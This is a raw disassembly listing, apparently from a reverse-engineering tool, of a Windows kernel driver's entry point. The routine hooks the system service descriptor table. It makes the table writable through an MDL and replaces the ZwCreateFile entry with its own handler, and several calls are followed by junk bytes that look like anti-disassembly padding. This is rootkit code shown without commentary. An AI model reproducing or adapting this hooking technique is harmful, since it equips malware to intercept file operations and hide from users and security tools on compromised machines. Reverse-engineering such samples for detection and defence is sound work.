.text:000104D6                 public start
.text:000104D6 start           proc near
.text:000104D6
.text:000104D6 arg_0           = dword ptr  8
.text:000104D6
.text:000104D6                 push    ebp
.text:000104D7                 mov     ebp, esp
.text:000104D9                 push    esi
.text:000104DA                 call    sub_10300
.text:000104DA ; ---------------------------------------------------------------------------
.text:000104DF                 db    2
.text:000104E0 ; ---------------------------------------------------------------------------
.text:000104E0                 cli
.text:000104E1                 nop
.text:000104E2                 nop
.text:000104E3                 nop
.text:000104E4                 nop
.text:000104E5                 sti
.text:000104E6                 mov     eax, [ebp+arg_0]
.text:000104E9                 mov     esi, ds:ZwCreateFile
.text:000104EF                 mov     dword ptr [eax+34h], offset byte_10486
.text:000104F6                 mov     ecx, ds:KeServiceDescriptorTable
.text:000104FC                 mov     eax, [esi+1]
.text:000104FF                 mov     ecx, [ecx]
.text:00010501                 mov     eax, [ecx+eax*4]
.text:00010504                 mov     dword_10714, eax
.text:00010509                 call    sub_10304
.text:00010509 ; ---------------------------------------------------------------------------
.text:0001050E                 db 0F0h ; =
.text:0001050F                 db  54h ; T
.text:00010510 ; ---------------------------------------------------------------------------
.text:00010510                 mov     eax, ds:KeServiceDescriptorTable
.text:00010515                 mov     ecx, [eax+8]
.text:00010518                 shl     ecx, 2
.text:0001051B                 push    ecx             ; Length
.text:0001051C                 push    dword ptr [eax] ; Base
.text:0001051E                 push    0               ; MemoryDescriptorList
.text:00010520                 call    ds:MmCreateMdl
.text:00010526                 test    eax, eax
.text:00010528                 mov     MemoryDescriptorList, eax
.text:0001052D                 jnz     short loc_10536
.text:0001052F                 mov     eax, 0C0000001h
.text:00010534                 jmp     short loc_1058E
.text:00010536 ; ---------------------------------------------------------------------------
.text:00010536
.text:00010536 loc_10536:                              ; CODE XREF: start+57j
.text:00010536                 call    sub_10300
.text:00010536 ; ---------------------------------------------------------------------------
.text:0001053B                 db 0E8h ; F
.text:0001053C ; ---------------------------------------------------------------------------
.text:0001053C                 push    MemoryDescriptorList ; MemoryDescriptorList
.text:00010542                 call    ds:MmBuildMdlForNonPagedPool
.text:00010548                 mov     eax, MemoryDescriptorList
.text:0001054D                 or      byte ptr [eax+6], 1
.text:00010551                 cli
.text:00010552                 nop
.text:00010553                 nop
.text:00010554                 nop
.text:00010555                 nop
.text:00010556                 sti
.text:00010557                 push    0               ; AccessMode
.text:00010559                 push    MemoryDescriptorList ; MemoryDescriptorList
.text:0001055F                 call    ds:MmMapLockedPages
.text:00010565                 mov     dword_10718, eax
.text:0001056A                 call    sub_10300
.text:0001056A ; ---------------------------------------------------------------------------
.text:0001056F                 db 0E8h ; F
.text:00010570 ; ---------------------------------------------------------------------------
.text:00010570                 mov     eax, [esi+1]
.text:00010573                 mov     ecx, dword_10718
.text:00010579                 lea     ecx, [ecx+eax*4] ; Target
.text:0001057C                 mov     edx, offset sub_10310 ; Value
.text:00010581                 call    ds:InterlockedExchange
.text:00010587                 mov     dword_10714, eax
.text:0001058C                 xor     eax, eax
.text:0001058E
.text:0001058E loc_1058E:                              ; CODE XREF: start+5Ej
.text:0001058E                 pop     esi
.text:0001058F                 pop     ebp
.text:00010590                 retn    8
.text:00010590 start           endp ; sp-analysis failed